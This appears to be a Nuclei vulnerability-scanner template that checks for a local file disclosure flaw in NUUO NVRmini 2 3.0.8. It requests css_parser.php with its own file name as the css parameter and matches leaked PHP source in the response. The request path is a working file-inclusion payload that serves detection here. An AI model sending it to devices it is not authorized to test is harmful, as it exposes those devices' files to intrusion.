id: nuuo-file-inclusion

info:
  name: NUUO NVRmini 2 3.0.8 Local File Disclosure
  author: princechaddha
  severity: high
  reference: https://www.exploit-db.com/exploits/40211
  tags: nuuo,lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/css_parser.php?css=css_parser.php"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "$_GET['css']"

      - type: word
        part: header
        words:
          - "text/css"

      - type: status
        status:
          - 200
